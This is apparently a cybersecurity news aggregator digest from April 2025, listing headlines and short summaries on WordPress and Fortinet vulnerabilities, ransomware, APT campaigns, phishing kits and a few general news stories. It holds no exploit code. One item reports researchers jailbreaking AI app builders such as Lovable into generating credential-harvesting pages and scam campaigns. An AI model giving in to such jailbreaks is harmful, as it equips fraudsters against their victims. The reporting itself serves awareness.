    2025-04-13 https://www.bbc.com/news/articles/cn4jl0xw35xo
    Dina Boluarte faced allegations that she accepted Rolex watches as bribes. "

    Autosummary: "


    Attackers are exploiting recently disclosed OttoKit WordPress plugin flaw

    exploits
    2025-04-12 https://securityaffairs.com/176461/security/ottokit-wordpress-plugin-flaw-exploitation.html
    Threat actors are exploiting a vulnerability in the OttoKit WordPress plugin, a few hours after public disclosure. Threat actors are exploiting a recently discovered vulnerability, tracked as CVE-2025-3102 (CVSS score of 8.1) in the OttoKit WordPress plugin (formerly SureTriggers), a few hours after public disclosure. An attacker can trigger the vulnerability to create malicious administrator users when the plugin is not […] "

    Autosummary: “The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the ‘secret_key’ value in the ‘autheticate_user’ function in all versions up to, and including, 1.0.78.” reads the advisory. "


    Tycoon2FA phishing kit targets Microsoft 365 with new tricks

    financial
    2025-04-12 https://www.bleepingcomputer.com/news/security/tycoon2fa-phishing-kit-targets-microsoft-365-with-new-tricks/
    Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities. [...] "

    Autosummary: SVG lures surging: In a separate but related report, Trustwave says it has identified a dramatic increase in phishing attacks using malicious SVG (Scalable Vector Graphics) files, driven by PhaaS platforms like Tycoon2FA, Mamba2FA, and Sneaky2FA. "


    General strike hits transport in Argentina

    latam
    2025-04-11 https://www.bbc.com/news/articles/czx1y5gwwwyo
    President Javier Milei has made sweeping cuts to public services since he took office 16 months ago. "

    Autosummary: The national airline, Aerolíneas Argentinas, said it had scrapped 258 flights, affecting around 20,000 passengers. Since then, the president has introduced tough austerity measures to tackle hyperinflation. "


    Ransomware groups push negotiations to new levels of uncertainty

    exploits
    2025-04-11 https://www.helpnetsecurity.com/2025/04/11/ransomware-incidents-frequency/

    Ransomware attacks increased by nearly 20% in 2024, and the severity rose by 13%, according to At-Bay. The blast radius of ransomware continues to grow as businesses impacted by attacks on vendors and partners increased 43%, while the average cost of these third-party incidents jumped by 72%. “Remote access tools like VPNs and RDP continue to attract a high level of attention from cybercriminals. In 2024, they were correlated with 80% of ransomware attacks, up … More "

    Autosummary: In 2024, they were correlated with 80% of ransomware attacks, up from 63% the year prior,” said Adam Tyra, CISO for Customers at At-Bay. "


    iOS devices face twice the phishing attacks of Android

    financial
    2025-04-11 https://www.helpnetsecurity.com/2025/04/11/mobile-cybersecurity-challenges/

    2024 brought about countless new cybersecurity challenges including significant growth of the mobile threat landscape, according to Lookout. Threat actors, ranging from nation-states to individuals, are increasingly targeting mobile devices for the onset of their attacks to steal credentials and infiltrate the enterprise cloud in a pathway known as the modern kill chain. More than ever, organizations of every size across every industry must view mobile targeting as a canary in the coal mine – … More "

    Autosummary: Misconfigurations can compromise mobile devices: Mobile device security must now be a priority for security teams, given the increased availability of sophisticated malware, the development of state-sponsored mobile malware, a notable number of iOS zero-day vulnerabilities, and a significant reliance on mobile social engineering. "


    SpyNote, BadBazaar, MOONSHINE Malware Target Android and iOS Users via Fake Apps

    exploits
    2025-04-11 https://thehackernews.com/2025/04/spynote-badbazaar-moonshine-malware.html
    Cybersecurity researchers have found that threat actors are setting up deceptive websites hosted on newly registered domains to deliver a known Android malware called SpyNote. These bogus websites masquerade as Google Play Store install pages for apps like the Chrome web browser, indicating an attempt to deceive unsuspecting users into installing the malware instead. "The threat actor utilized a "

    Autosummary: Intel Agencies Warn of BadBazaar and MOONSHINE: The findings also follow a joint advisory issued by cybersecurity and intelligence agencies from Australia, Canada, Germany, New Zealand, the United Kingdom, and the United States about the targeting of Uyghur, Taiwanese, and Tibetan communities using malware families such as BadBazaar and MOONSHINE. The use of BadBazaar has been tied to a Chinese hacking group tracked as APT15, which is also known as Flea, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda. "


    OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation

    exploits
    2025-04-11 https://thehackernews.com/2025/04/ottokit-wordpress-plugin-admin-creation.html
    A newly disclosed high-severity security flaw impacting OttoKit (formerly SureTriggers) has come under active exploitation within a few hours of public disclosure. The vulnerability, tracked as CVE-2025-3102 (CVSS score: 8.1), is an authorization bypass bug that could permit an attacker to create administrator accounts under certain conditions and take control of susceptible websites. "The "

    Autosummary: "


    Gamaredon targeted the military mission of a Western country based in Ukraine

    government
    2025-04-11 https://securityaffairs.com/176433/apt/gamaredon-targeted-the-military-mission-of-a-western-country-based-in-ukraine.html
    Gamaredon targeted a foreign military mission in Ukraine with updated GammaSteel malware on Feb 26, 2025, per Symantec. Symantec Threat Hunter researchers reported that the Russia-linked APT group Gamaredon (a.k.a. Shuckworm, Armageddon, Primitive Bear, ACTINIUM, Callisto) targeted a foreign military mission based in Ukraine with an updated version of the GammaSteel infostealer. Shuckworm is known for targeting government, […] "

    Autosummary: Pierluigi Paganini, April 11, 2025: Gamaredon targeted a foreign military mission in Ukraine with updated GammaSteel malware on Feb 26, 2025, per Symantec. "


    Ransomware attack cost IKEA operator in Eastern Europe $23 million

    exploits
    2025-04-11 https://www.bleepingcomputer.com/news/security/ransomware-attack-cost-ikea-operator-in-eastern-europe-23-million/
    Fourlis Group, the operator of IKEA stores in Greece, Cyprus, Romania, and Bulgaria, has disclosed that the ransomware attack it suffered just before Black Friday on November 27, 2024, caused losses estimated at €20 million ($22.8M). [...] "

    Autosummary: "


    Ransomware reaches a record high, but payouts are dwindling

    exploits
    2025-04-11 https://www.tripwire.com/state-of-security/ransomware-reaches-record-high-payouts-are-dwindling
    Will you be shedding a tear for the cybercriminals? Read more in my article on the Tripwire blog. "

    Autosummary: BlackFog's "State of Ransomware" report details over 100 publicly disclosed attacks in March 2025 - an 81% increase from the year before - with an average ransom demand of US $663,582. "


    Paper Werewolf Deploys PowerModul Implant in Targeted Cyberattacks on Russian Sectors

    rusia-ucrania ciber
    2025-04-11 https://thehackernews.com/2025/04/paper-werewolf-deploys-powermodul.html
    The threat actor known as Paper Werewolf has been observed exclusively targeting Russian entities with a new implant called PowerModul. The activity, which took place between July and December 2024, singled out organizations in the mass media, telecommunications, construction, government entities, and energy sectors, Kaspersky said in a new report published Thursday. Paper Werewolf, also known "

    Autosummary: Some of the other payloads dropped by PowerModul are listed below: FlashFileGrabber, which is used to steal files from removable media, such as flash drives, and exfiltrate them to the C2 server; FlashFileGrabberOffline, a variant of FlashFileGrabber that searches removable media for files with specific extensions, and when found, copies them to the local disk within the "%TEMP%\CacheStore\connect\" folder; and USB Worm, which is capable of infecting removable media with a copy of PowerModul. PowerTaskel is functionally similar to PowerModul in that it's also designed to run PowerShell scripts sent by the C2 server. "


    Initial Access Brokers Shift Tactics, Selling More for Less

    industry
    2025-04-11 https://thehackernews.com/2025/04/initial-access-brokers-shift-tactics.html
    What are IABs? Initial Access Brokers (IABs) specialize in gaining unauthorized entry into computer systems and networks, then selling that access to other cybercriminals. This division of labor allows IABs to concentrate on their core expertise: exploiting vulnerabilities through methods like social engineering and brute-force attacks. By selling access, they significantly mitigate the "

    Autosummary: For detailed insights into contemporary IAB tactics, including access types, privilege usage, and recommended protective measures, consult the comprehensive IAB guide or attend our talk at this year's RSA conference by Adi Bleih, Security Researcher, titled Initial Access Brokers – A Deep Dive on April 30th at 2:25pm in HT-W09. Therefore, proactive cyber security measures, including threat intelligence on up to date TTPs, continuous monitoring, and employee training, will become increasingly critical in mitigating the growing threat posed by IABs. While 2023 saw an average listing price of $1,979, skewed by occasional high-value targets reaching tens of thousands of dollars, the median price remained significantly lower at $1,000, with a majority of listings below $3,000. "


    Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices

    exploits
    2025-04-11 https://www.helpnetsecurity.com/2025/04/11/fortios-fortigate-vulnerabilities-symlink-trick-limited-access/

    A threat actor that has been using known old FortiOS vulnerabilities to breach FortiGate devices for years has also been leveraging a clever trick to maintain undetected read-only access to them after the original access vector was locked down, Fortinet has revealed on Thursday. “[Read-only access] was achieved via creating a symbolic link connecting the user filesystem and the root filesystem in a folder used to serve language files for the SSL-VPN,” Fortinet CISO Carl … More "

    Autosummary: Earlier this week, Fortinet started sending out an email notice to an unknown number of customers, saying that their telemetry shows they had been affected and advising them to take immediate action by: upgrading to FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17 or 6.4.16 to remove the malicious file and prevent a new compromise; reviewing the configuration of the device but also treating it as potentially compromised; and going through the steps outlined here, which include resetting all users’ credentials, revoking certificates, resetting secrets, etc. "


    Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit

    exploits
    2025-04-11 https://thehackernews.com/2025/04/fortinet-warns-attackers-retain.html
    Fortinet has revealed that threat actors have found a way to maintain read-only access to vulnerable FortiGate devices even after the initial access vector used to breach the devices was patched. The attackers are believed to have leveraged known and now-patched security flaws, including, but not limited to, CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. "A threat actor used a known "

    Autosummary: The attackers are believed to have leveraged known and now-patched security flaws, including, but not limited to, CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. "


    Laboratory Services Cooperative data breach impacts 1.6 Million People

    financial
    2025-04-11 https://securityaffairs.com/176451/data-breach/laboratory-services-cooperative-data-breach.html
    Laboratory Services Cooperative discloses a data breach from October 2024 that exposed personal and medical info of 1.6 million individuals. Laboratory Services Cooperative disclosed a data breach that impacted the personal and medical information of 1.6 million people. The Laboratory Services Cooperative (LSC) is a clinical laboratory based in Bremerton, Washington, providing diagnostic testing services […] "

    Autosummary: The stolen data from the LSC breach may include names, addresses, phone numbers, and emails, as well as medical information (diagnoses, lab results, treatment details), health insurance details (plan info, member IDs), billing and payment data (bank account and card info), and sensitive identifiers like Social Security numbers, driver’s license or passport numbers, dates of birth, and student or government IDs. "


    Teenagers die as fans and police clash in Chile

    latam
    2025-04-11 https://www.bbc.com/sport/football/articles/czrv888e37yo
    Two teenagers die as fans and police clash before a Copa Libertadores game in Chile between hosts Colo Colo and Brazilian side Fortaleza. "

    Autosummary: "


    Review: The Ultimate Kali Linux Book, Third Edition

    Linux
    2025-04-10 https://www.helpnetsecurity.com/2025/04/10/review-the-ultimate-kali-linux-book-third-edition/

    Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking. He holds an MSc in Cybersecurity and numerous industry certifications. Inside the book One of the best things … More "

    Autosummary: About the author: Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking. Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. "


    Sensata Technologies hit by ransomware attack impacting operations

    exploits ransomware
    2025-04-10 https://www.bleepingcomputer.com/news/security/sensata-technologies-hit-by-ransomware-attack-impacting-operations/
    Sensata Technologies (known as Sensata) suffered a ransomware attack last weekend that encrypted parts of the company network and disrupted operations. [...] "

    Autosummary: "


    FortiSwitch vulnerability may give attackers control over vulnerable devices (CVE-2024-48887)

    exploits
    2025-04-10 https://www.helpnetsecurity.com/2025/04/10/fortiswitch-vulnerability-cve-2024-48887/

    Fortinet has released patches for flaws affecting many of its products, among them a critical vulnerability (CVE-2024-48887) in its FortiSwitch appliances that could allow unauthenticated attackers to gain access to, and administrative privileges on, vulnerable devices. About CVE-2024-48887 Fortinet offers a range of FortiSwitch networking appliances, including access switches, distribution switches (for managing traffic), industrial/rugged switches, and core switches designed for data centers. Fortinet describes CVE-2024-48887 as an unverified password change vulnerability in the FortiSwitch … More "

    Autosummary: "


    An APT group exploited ESET flaw to execute malware

    exploits
    2025-04-10 https://securityaffairs.com/176364/security/an-apt-group-exploited-eset-flaw-to-execute-malware.html
    At least one APT group has exploited a vulnerability in ESET software to stealthily execute malware, bypassing security measures. Kaspersky researchers reported that an APT group, tracked as ToddyCat, has exploited a vulnerability in ESET software to stealthily execute malware, bypassing security. The vulnerability, tracked as CVE-2024-11859, is a DLL Search Order Hijacking issue that potentially allows […] "

    Autosummary: “On systems with an affected ESET product installed, an attacker could plant a malicious dynamic-link library to a specific folder and execute its content by running ESET Command Line Scanner, which would load the planted library instead of the intended system library.” reads ESET’s advisory. "


    Russian hackers attack Western military mission using malicious drive

    rusia-ucrania
    2025-04-10 https://www.bleepingcomputer.com/news/security/russian-hackers-attack-western-military-mission-using-malicious-drive/
    The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. [...] "

    Autosummary: Payload stored in Registry, obfuscated and split by functions (Source: Symantec). The malware can steal documents (.DOC, .PDF, .XLS, .TXT) from various locations like Desktop, Documents, and Downloads, confirming Gamaredon’s continuing interest in espionage. "


    Hackers exploit WordPress plugin auth bypass hours after disclosure

    exploits
    2025-04-10 https://www.bleepingcomputer.com/news/security/hackers-exploit-wordpress-plugin-auth-bypass-hours-after-disclosure/
    Hackers started exploiting a high-severity flaw that allows bypassing authentication in the OttoKit (formerly SureTriggers) plugin for WordPress just hours after public disclosure. [...] "

    Autosummary: If you’re using OttoKit/SureTriggers, upgrade to version 1.0.79 as soon as possible and check logs for unexpected admin accounts or other user roles, installation of plugins/themes, database access events, and modification of security settings. "


    U.S. CISA adds Linux Kernel flaws to its Known Exploited Vulnerabilities catalog

    exploits Linux
    2025-04-10 https://securityaffairs.com/176427/hacking/u-s-cisa-adds-linux-kernel-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Linux Kernel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Linux Kernel flaws, respectively tracked as CVE-2024-53197 and CVE-2024-53150, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability CVE-2024-53197 (CVSS score of 7.8) resides in the Linux kernel’s ALSA USB-audio driver affecting Extigy […] "

    Autosummary: The vulnerability CVE-2024-53197 (CVSS score of 7.8) resides in the Linux kernel’s ALSA USB-audio driver affecting Extigy and Mbox devices, where incorrect handling of USB configuration data could lead to out-of-bounds memory access. "


    British man's tattoo wrongly linked to Venezuelan gang in US government document

    government
    2025-04-10 https://www.bbc.com/news/articles/cly22xm8kx1o
    A tattoo belonging to a man from Derbyshire has appeared in a US government document used to identify members of Tren de Aragua, a notorious Venezuelan gang, despite the man having no connection to the group. "

    Autosummary: BBC Verify: A tattoo belonging to a man from Derbyshire has appeared in a US government document used to identify members of a notorious Venezuelan gang - despite the man having no connection to the group. "


    OpenAI sues Elon Musk claiming "bad-faith tactics"

    industry
    2025-04-10 https://www.bbc.com/news/articles/cg4114271x2o
    Claim follows Mr Musk's own lawsuit earlier this year against OpenAI's Sam Altman. "

    Autosummary: In February, Mr Musk made an unsolicited bid for OpenAI, offering to buy it for $97.4 billion, which Mr Altman rejected by posting: "no thank you but we will buy twitter for $9.74 billion if you want." "


    Transforming cybersecurity into a strategic business enabler

    ciber
    2025-04-09 https://www.helpnetsecurity.com/2025/04/09/kevin-serafin-ecolab-cybersecurity-strategy-business/

    In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility. How do you define cyber risk within your organization’s overall enterprise risk framework? At Ecolab, we don’t approach cyber risk in isolation. Instead, it’s positioned as an integral component of our overall enterprise risk management framework. We define cyber risk as the potential for … More "

    Autosummary: In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility. We define cyber risk as the potential for loss or harm related to technical infrastructure, use of technology, or management of information and, generally, we evaluate risk in a few different ways. First, we look at operational risks, which includes risks that could disrupt our ability to deliver products or services including system outages, data corruption, or impact to critical infrastructure that could affect business continuity. "


    Microsoft Patches 126 Flaws Including Actively Exploited Windows CLFS Vulnerability

    exploits
    2025-04-09 https://thehackernews.com/2025/04/microsoft-patches-126-flaws-including.html
    Microsoft has released security fixes to address a massive set of 126 flaws affecting its software products, including one vulnerability that it said has been actively exploited in the wild. Of the 126 vulnerabilities, 11 are rated Critical, 112 are rated Important, and two are rated Low in severity. Forty-nine of these vulnerabilities are classified as privilege escalation, 34 as remote code "

    Autosummary: Some of the other notable vulnerabilities patched by Redmond this month include a security feature bypass (SFB) flaw affecting Windows Kerberos (CVE-2025-29809), as well as remote code execution flaws in Windows Remote Desktop Services (CVE-2025-27480, CVE-2025-27482), and Windows Lightweight Directory Access Protocol (CVE-2025-26663, CVE-2025-26670). Also of note are multiple Critical-severity remote code execution flaws in Microsoft Office and Excel (CVE-2025-29791, CVE-2025-27749, CVE-2025-27748, CVE-2025-27745, and CVE-2025-27752) that could be exploited by a bad actor using a specially crafted Excel document, resulting in full system control. "


    72% of people are worried their data is being misused by the government, and that’s not all…

    government Linux
    2025-04-09 https://www.malwarebytes.com/blog/news/2025/04/72-of-people-are-worried-their-data-is-being-misused-by-the-government-and-thats-not-all
    Our privacy is most at risk from companies, governments, and AI models, according to a new public survey from Malwarebytes. "

    Autosummary: For instance, to protect their and their family’s personal information, 47% of people said they “stopped using TikTok,” 45% said they “stopped using X” (formerly Twitter), 44% said they “stopped using Instagram,” and 37% said they “stopped using Facebook.” While 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” 60% feel that “we will never have simple, meaningful ways to protect our data.” A full 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” while 70% also believe “we will never have simple, meaningful ways to protect our data.” "


    WhatsApp vulnerability could be used to infect Windows users with malware (CVE-2025-30401)

    exploits
    2025-04-09 https://www.helpnetsecurity.com/2025/04/09/whatsapp-vulnerability-windows-cve-2025-30401/

    WhatsApp users are urged to update the Windows client app to plug a serious security vulnerability (CVE-2025-30401) that may allow attackers to trick users into running malicious code. Meta classifies the vulnerability as a spoofing issue that makes all WhatsApp for Windows versions prior to v2.2450.6 display sent attachments according to their MIME (media) type – i.e., the metadata that says what kind of file it is: audio, image, message, text, application, etc. – but … More "

    Autosummary: "


    RCE flaw in MSP-friendly file sharing platform exploited by attackers (CVE-2025-30406)

    exploits
    2025-04-09 https://www.helpnetsecurity.com/2025/04/09/rce-gladinet-centrestack-file-sharing-exploited-cve-2025-30406/

    A critical RCE vulnerability (CVE-2025-30406) affecting the Gladinet CentreStack file-sharing/remote access platform has been added to CISA’s Known Exploited Vulnerabilities catalog on Tuesday. According to the vulnerability’s entry in NIST’s National Vulnerability Database, the flaw has been leveraged in attacks since March 2025. About CVE-2025-30406 CentreStack is a platform that allows managed service providers (MSPs) to offer cloud-like file services to their customers: file sharing, backup, collaboration, and remote access. CVE-2025-30406 is a deserialization vulnerability … More "

    Autosummary: Vulnerabilities (often zero-days) in enterprise-grade file transfer/sharing solutions are often exploited by attackers: flaws in Progress Software’s MOVEit solution, Cleo‘s various file transfer software, Fortra’s GoAnywhere and, most recently, CrushFTP have been leveraged by attackers in the past two years. "


    New TCESB Malware Found in Active Attacks Exploiting ESET Security Scanner

    exploits
    2025-04-09 https://thehackernews.com/2025/04/new-tcesb-malware-found-in-active.html
    A Chinese-affiliated threat actor known for its cyber-attacks in Asia has been observed exploiting a security flaw in security software from ESET to deliver a previously undocumented malware codenamed TCESB. "Previously unseen in ToddyCat attacks, [TCESB] is designed to stealthily execute payloads in circumvention of protection and monitoring tools installed on the device," Kaspersky said in an "

    Autosummary: It's worth pointing out at this stage that "version.dll" is a legitimate version-checking and file installation library from Microsoft that resides in the "C:\Windows\system32\" or "C:\Windows\SysWOW64\" directories. "


    PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware

    exploits ransomware
    2025-04-09 https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-clfs.html
    Microsoft has revealed that a now-patched security flaw impacting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. "The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in "

    Autosummary: "In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim's machines were infected with a custom modular backdoor named "PipeMagic" that gets launched via an MSBuild script," Kaspersky pointed out in April 2023. "


    CISA Warns of CentreStack's Hard-Coded MachineKey Vulnerability Enabling RCE Attacks

    exploits
    2025-04-09 https://thehackernews.com/2025/04/cisa-warns-of-centrestacks-hard-coded.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Gladinet CentreStack to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, tracked as CVE-2025-30406 (CVSS score: 9.0), concerns a case of a hard-coded cryptographic key that could be abused to achieve remote "

    Autosummary: "


    U.S. CISA adds Gladinet CentreStack and ZTA Microsoft Windows Common Log File System (CLFS) Driver flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-09 https://securityaffairs.com/176366/hacking/u-s-cisa-adds-gladinet-centrestack-and-zta-microsoft-windows-common-log-file-system-clfs-driver-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Gladinet CentreStack and ZTA Microsoft Windows Common Log File System (CLFS) Driver flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Gladinet CentreStack and ZTA Microsoft Windows Common Log File System (CLFS) Driver flaws, respectively tracked as CVE-2025-30406 and CVE-2025-29824, to its […] "

    Autosummary: Pierluigi Paganini, April 09, 2025: U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Gladinet CentreStack and ZTA Microsoft Windows Common Log File System (CLFS) Driver flaws to its Known Exploited Vulnerabilities catalog. "


    CentreStack RCE exploited as zero-day to breach file sharing servers

    exploits
    2025-04-09 https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/
    Hackers exploited a vulnerability in Gladinet CentreStack's secure file-sharing software as a zero-day since March to breach storage servers. [...] "

    Autosummary: Hackers exploited a vulnerability in Gladinet CentreStack"s secure file-sharing software as a zero-day since March to breach storage servers Gladinet CentreStack is an enterprise file-sharing and access platform that turns on-premise file servers (like Windows servers with SMB shares) into secure, cloud-like file systems supporting remote access to internal file shares, file syncing and sharing, multi-tenant deployments, and integration with Active Directory. "


    Who's calling? The threat of AI-powered vishing attacks

    financial
    2025-04-09 https://www.bleepingcomputer.com/news/security/whos-calling-the-threat-of-ai-powered-vishing-attacks/
    AI is making voice phishing (vishing) more dangerous than ever, with scammers cloning voices in seconds to trick employees into handing over their credentials. Learn how to defend your organization with Specops Secure Service Desk. [...]

    Autosummary: This initial access led to a massive data breach, costing MGM Resorts millions in revenue and causing widespread system disruptions, including issues with reservations, electronic payments, and slot machines in casinos. By implementing authentication measures, educating employees, and adopting security best practices, organizations can reduce their exposure to vishing attacks. Vishing, or "voice phishing," is a form of social engineering where scammers use phone calls to deceive victims into revealing sensitive information or making fraudulent payments. Some cybercriminals also offer "Vishing-as-a-Service" (VaaS), where they sell their talents to less-skilled fraudsters.


    Phishing kits now vet victims in real-time before stealing credentials

    financial
    2025-04-09 https://www.bleepingcomputer.com/news/security/phishing-kits-now-vet-victims-in-real-time-before-stealing-credentials/
    Phishing actors are employing a new evasion tactic called "Precision-Validated Phishing" that only shows fake login forms when a user enters an email address that the threat actors specifically targeted. [...]

    Autosummary: Unlike traditional mass-targeting phishing, this new method uses real-time email validation to ensure phishing content is shown only to pre-verified, high-value targets.


    Police detains Smokeloader malware customers, seizes servers

    exploits
    2025-04-09 https://www.bleepingcomputer.com/news/security/police-detains-smokeloader-malware-customers-seizes-servers/
    In follow-up activity for Operation Endgame, law enforcement tracked down Smokeloader botnet's customers and detained at least five individuals. [...]


    Lovable AI Found Most Vulnerable to VibeScamming — Enabling Anyone to Build Live Scam Pages

    financial
    2025-04-09 https://thehackernews.com/2025/04/lovable-ai-found-most-vulnerable-to.html
    Lovable, a generative artificial intelligence (AI) powered platform that allows for creating full-stack web applications using text-based prompts, has been found to be the most susceptible to jailbreak attacks, allowing novice and aspiring cybercrooks to set up lookalike credential harvesting pages. "As a purpose-built tool for creating and deploying web apps, its capabilities line up perfectly

    Autosummary: Guardio Labs' latest analysis takes a step further, uncovering that platforms like Lovable and Anthropic Claude, to a lesser extent, could be weaponized to generate complete scam campaigns, complete with SMS text message templates, Twilio-based SMS delivery of the fake links, content obfuscation, defense evasion, and Telegram integration.


    Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials

    exploits
    2025-04-09 https://www.bleepingcomputer.com/news/security/hackers-target-ssrf-bugs-in-ec2-hosted-sites-to-steal-aws-credentials/
    A targeted campaign exploited Server-Side Request Forgery (SSRF) vulnerabilities in websites hosted on AWS EC2 instances to extract EC2 Metadata, which could include Identity and Access Management (IAM) credentials from the IMDSv1 endpoint. [...]

    Autosummary: The top four most exploited CVEs by volume were:
    CVE-2017-9841 – PHPUnit remote code execution via eval-stdin.php (69,433 attempts)
    CVE-2020-8958 – Guangzhou ONU OS command injection RCE (4,773 attempts)
    CVE-2023-1389 – TP-Link Archer AX21 command injection RCE (4,698 attempts)
    CVE-2019-9082 – ThinkPHP PHP injection RCE (3,534 attempts)
    Figure: Exploitation volumes (Source: F5)


    National Social Security Fund of Morocco Suffers Data Breach

    financial
    2025-04-09 https://securityaffairs.com/176388/security/national-social-security-fund-of-morocco-suffers-data-breach.html
    Threat actor ‘Jabaroot’ claims breach of National Social Security Fund of Morocco, aiming to steal large volumes of sensitive citizen data. Resecurity has identified a threat actor targeting government systems in Morocco with the goal of exfiltrating large volumes of sensitive data relating to citizens. The actor using the alias ‘Jabaroot’ released claims about the […]

    Autosummary: Other benefits: The CNSS also provides benefits for maternity, invalidity, family allowances, death grants, and survivor’s pensions. The threat actor has leaked CSV and PDF files containing personal information about 1,996,026 employees from various enterprises operating in Morocco.


    Phishing, fraud, and the financial sector’s crisis of trust

    financial
    2025-04-08 https://www.helpnetsecurity.com/2025/04/08/financial-sector-customer-trust/

    The financial sector is under growing pressure from advanced phishing attacks and fraud, causing major financial losses and eroding customer trust. Escalation of phishing attacks: While traditional phishing relied on generic emails to steal sensitive data, cybercriminals now use targeted spear-phishing, leveraging personal information for credibility. AI-driven attacks, including deepfake scams, allow fraudsters to impersonate bank executives or customer service representatives, making detection more difficult. Voice phishing (vishing) and SMS phishing (smishing) have also risen, … More

    The post Phishing, fraud, and the financial sector’s crisis of trust appeared first on Help Net Security.

    Autosummary: Phishing and fraud erode customer trust, threatening the financial sector’s reputation. The financial toll on victims of phishing and fraud is immense, with many losing significant amounts of money, including life savings, in a single scam. “Finally, continuous education and awareness programs for employees and consumers are vital in protecting customer data, maintaining trust, and strengthening the human defense layer,” said Sunil Mallik, CISO of Discover Financial Services. These links appear in various sources, including emails, messaging apps, social media, advertisements, and search engine results.


    Cyberattacks on water and power utilities threaten public safety

    ciber
    2025-04-08 https://www.helpnetsecurity.com/2025/04/08/state-of-critical-infrastructure-resilience/

    62% of utility operators were targeted by cyberattacks in the past year, and of those, 80% were attacked multiple times, according to Semperis. 54% suffered permanent corruption or destruction of data and systems. (Source: Semperis) Utilities face rising cyber threats: Recent high-profile cyberattacks by nation-state groups on water and electricity utilities underscore the vulnerability of critical infrastructure. A public utility in Littleton, MA, was recently compromised by a group linked to Volt Typhoon, the Chinese … More

    Autosummary: Prioritize incident response and recovery for these systems, followed by mission-critical (Tier 1) functions, business-critical (Tier 2) functions, and then all other (Tier 3) functions.


    Cybersecurity jobs available right now: April 8, 2025

    ciber
    2025-04-08 https://www.helpnetsecurity.com/2025/04/08/cybersecurity-jobs-available-right-now-april-8-2025/

    Application Security Engineer (DevSecOps & VAPT), Derisk360 | India | On-site: As an Application Security Engineer (DevSecOps & VAPT), you will integrate security into CI/CD pipelines, conduct vulnerability assessments and penetration testing, and use tools like SonarCloud and Checkmarx for secure code analysis. You will also guide developers on secure coding practices, perform code reviews, and conduct regular application security audits.
    Cyber and Information Security Architect, Prospera Credit Union | Canada | … More

    Autosummary:
    Senior Penetration Tester, Ekco | Ireland | On-site: As a Senior Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, mobile applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks.
    Network Engineer, London Luton Airport | United Kingdom | On-site: As a Network Engineer, you will be responsible for designing, maintaining, and supporting the networking infrastructure in both on-premise and cloud environments, including switching, routing, encryption, security, VoIP and wireless.
    Manager, Cybersecurity, Global, Vantage Data Centers | USA | Remote: As a Manager, Cybersecurity, Global, you will develop and lead enterprise security policies, standards, and risk management frameworks to safeguard critical infrastructure.
    Cyber Security Engineer, Chicago Housing Authority | USA | Hybrid: As a Cyber Security Engineer, you will lead the design, implementation, and management of security systems, including firewalls, intrusion prevention systems, and endpoint protection.


    Google Releases Android Update to Patch Two Actively Exploited Vulnerabilities

    exploits
    2025-04-08 https://thehackernews.com/2025/04/google-releases-android-update-to-patch.html
    Google has shipped patches for 62 vulnerabilities, two of which it said have been exploited in the wild. The two high-severity vulnerabilities are listed below:
    CVE-2024-53150 (CVSS score: 7.8) - An out-of-bounds flaw in the USB sub-component of Kernel that could result in information disclosure
    CVE-2024-53197 (CVSS score: 7.8) - A privilege escalation flaw in the USB sub-component of Kernel


    Russian bots hard at work spreading political unrest on Romania’s internet

    rusia-ucrania
